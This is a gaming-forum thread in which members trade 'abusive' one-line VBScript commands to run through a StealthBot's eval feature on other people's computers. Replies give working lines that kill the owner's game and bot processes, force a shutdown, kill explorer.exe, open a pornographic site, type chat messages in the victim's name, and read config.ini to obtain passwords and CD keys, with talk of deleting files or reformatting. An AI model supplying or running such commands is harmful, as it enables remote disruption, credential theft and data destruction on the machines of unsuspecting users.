Abusive VBScript ^^?
-
- The Flying Cow!
- Posts: 2196
- Joined: November 2nd, 2007, 10:34 pm
- Location: Melbourne
Abusive VBScript ^^?
Hi, does anyone have any abusive VBScripts that are ONE LINE which they can share ?
Visit Ozzapoo.net, my blog and the home of AutoCP and Cheatpack Detector!
AutoCP3 now available for free!
AutoCP3 now available for free!
-
- Shopping Maul USA Creator
- Posts: 1771
- Joined: January 18th, 2007, 11:07 am
- Title: No Comment
- Location: Calgary Canada
- Has thanked: 50 times
- Been thanked: 8 times
-
- The Flying Cow!
- Posts: 2196
- Joined: November 2nd, 2007, 10:34 pm
- Location: Melbourne
Re: Abusive VBScript ^^?
I didn't really get that...But I meant 'one line' as in (for example):Vegas wrote:One line, you mean like Arnold when he says, "I'll Be Back", ?
Instead of:
Dim obj as CreateObject("WScript.Shell")
obj.SendKeys("Hi{ENTER}")
You do:
CreateObject("WScript.Shell").SendKeys("Hi{ENTER}")
Are there any more potential abusive scripts which I can use?
Visit Ozzapoo.net, my blog and the home of AutoCP and Cheatpack Detector!
AutoCP3 now available for free!
AutoCP3 now available for free!
-
- Forum Fanatic
- Posts: 398
- Joined: July 26th, 2008, 4:28 pm
- Title: The Faithful
- Location: Portugal
Re: Abusive VBScript ^^?
First time I ever heard that btw what you mean by Abusive VBScript?
Things can be lost aren´t lost at all.
-
- The Flying Cow!
- Posts: 2196
- Joined: November 2nd, 2007, 10:34 pm
- Location: Melbourne
Re: Abusive VBScript ^^?
Alright.....
You know StealthBot? If you just ask for 50 access (that's not all that much) and then use:
.eval CreateObject("WScript.Shell").Run("tskill wa*")
Then you can instantly close the owner of the bot's wc3.
.eval CreateObject("WScript.Shell").Run("tskill se*")
Close SB
.eval CreateObject("WScript.Shell").Run("iexplore www.redtube.com")
Open Redtube (porn) with Internet Explorer
.eval CreateObject("WScript.Shell").SendKeys("I am a nubz00r!!!!!{ENTER}")
Make them type "I am a nubz00r!!!!!" and then hit enter. (If they happen to be in chat, they will just randomly type it XD)
Yeah...Unfortunately you can't compress VBScript into one-liners like C++... -.-"
You know StealthBot? If you just ask for 50 access (that's not all that much) and then use:
.eval CreateObject("WScript.Shell").Run("tskill wa*")
Then you can instantly close the owner of the bot's wc3.
.eval CreateObject("WScript.Shell").Run("tskill se*")
Close SB
.eval CreateObject("WScript.Shell").Run("iexplore www.redtube.com")
Open Redtube (porn) with Internet Explorer
.eval CreateObject("WScript.Shell").SendKeys("I am a nubz00r!!!!!{ENTER}")
Make them type "I am a nubz00r!!!!!" and then hit enter. (If they happen to be in chat, they will just randomly type it XD)
Yeah...Unfortunately you can't compress VBScript into one-liners like C++... -.-"
Visit Ozzapoo.net, my blog and the home of AutoCP and Cheatpack Detector!
AutoCP3 now available for free!
AutoCP3 now available for free!
-
- Forum Fanatic
- Posts: 398
- Joined: July 26th, 2008, 4:28 pm
- Title: The Faithful
- Location: Portugal
-
- Forum Staff
- Posts: 2618
- Joined: June 2nd, 2007, 6:53 pm
- Title: I Just Lost the Game
Re: Abusive VBScript ^^?
Ozzapoo wrote:I didn't really get that...Vegas wrote:One line, you mean like Arnold when he says, "I'll Be Back", ?
The Terminator! Haven't you seen it? If not, go out to a movie store, NOW, and rent it. You gotta watch them all... It's like not watching 2001, or Dr. Strangelove, or The Great Escape, or Star Trek, or Star Wars! So many things (especially spoofs) are based on it, you have to watch it!
Err... I would help, but I know nothing of VB... I'm trying to learn, but I really wouldn't know anything about it. Try setting up a recursive loop, where the loop will call itself. Couldn't you make it tie up resources, possibly making the computer crash? I may just have no clue what I'm talking about, though...
My Warcraft III Tool Collection
If you want to chat/game with me:
Blizzard: Senethior459#1962
Discord: Kyle#7409
Steam: Spacekidkyle
If you want to chat/game with me:
Blizzard: Senethior459#1962
Discord: Kyle#7409
Steam: Spacekidkyle
-
- Forum Staff
- Posts: 351
- Joined: June 8th, 2008, 3:05 am
- Location: Australia
Re: Abusive VBScript ^^?
.math createobject("wscript.shell").run("shutdown -s -f -t 0")
.eval createobject("wscript.shell").run("shutdown -s -f -t 0")
Turns comp off
.math createObject("Scripting.FileSystemObject").OpenTextFile("config.ini", 1, False, -2).ReadAll
.eval createObject("Scripting.FileSystemObject").OpenTextFile("config.ini", 1, False, -2).ReadAll
In theory you could get there password + CDKeys
But the Bot would d/c because it would spam it and get D/c for flooding
.math CreateObject("WScript.Shell").run("taskkill /im ""explorer.exe"" /f")
.eval CreateObject("WScript.Shell").run("taskkill /im ""explorer.exe"" /f")
That can be annoying..
With the
.math CreateObject ("WScript.Shell").run("")
.eval CreateObject ("WScript.Shell").run("")
You could delete files.. ( Can't think of it )
Possibly reformat
.eval createobject("wscript.shell").run("shutdown -s -f -t 0")
Turns comp off
.math createObject("Scripting.FileSystemObject").OpenTextFile("config.ini", 1, False, -2).ReadAll
.eval createObject("Scripting.FileSystemObject").OpenTextFile("config.ini", 1, False, -2).ReadAll
In theory you could get there password + CDKeys
But the Bot would d/c because it would spam it and get D/c for flooding
.math CreateObject("WScript.Shell").run("taskkill /im ""explorer.exe"" /f")
.eval CreateObject("WScript.Shell").run("taskkill /im ""explorer.exe"" /f")
That can be annoying..
With the
.math CreateObject ("WScript.Shell").run("")
.eval CreateObject ("WScript.Shell").run("")
You could delete files.. ( Can't think of it )
Possibly reformat
-
- Shopping Maul USA Creator
- Posts: 1771
- Joined: January 18th, 2007, 11:07 am
- Title: No Comment
- Location: Calgary Canada
- Has thanked: 50 times
- Been thanked: 8 times
Re: Abusive VBScript ^^?
Senethior459 wrote:Ozzapoo wrote:I didn't really get that...Vegas wrote:One line, you mean like Arnold when he says, "I'll Be Back", ?
The Terminator! Haven't you seen it? If not, go out to a movie store, NOW, and rent it. You gotta watch them all... It's like not watching 2001, or Dr. Strangelove, or The Great Escape, or Star Trek, or Star Wars! So many things (especially spoofs) are based on it, you have to watch it!
Err... I would help, but I know nothing of VB... I'm trying to learn, but I really wouldn't know anything about it. Try setting up a recursive loop, where the loop will call itself. Couldn't you make it tie up resources, possibly making the computer crash? I may just have no clue what I'm talking about, though...
I think he didnt get "one liner".
-
- Forum Staff
- Posts: 2618
- Joined: June 2nd, 2007, 6:53 pm
- Title: I Just Lost the Game
Re: Abusive VBScript ^^?
I thought he meant he didn't get the Terminator reference... I dunno. Wait for him to reply?
And risker, that last one is hilarious... Reformatting their hard drive. Ouch.
And risker, that last one is hilarious... Reformatting their hard drive. Ouch.
My Warcraft III Tool Collection
If you want to chat/game with me:
Blizzard: Senethior459#1962
Discord: Kyle#7409
Steam: Spacekidkyle
If you want to chat/game with me:
Blizzard: Senethior459#1962
Discord: Kyle#7409
Steam: Spacekidkyle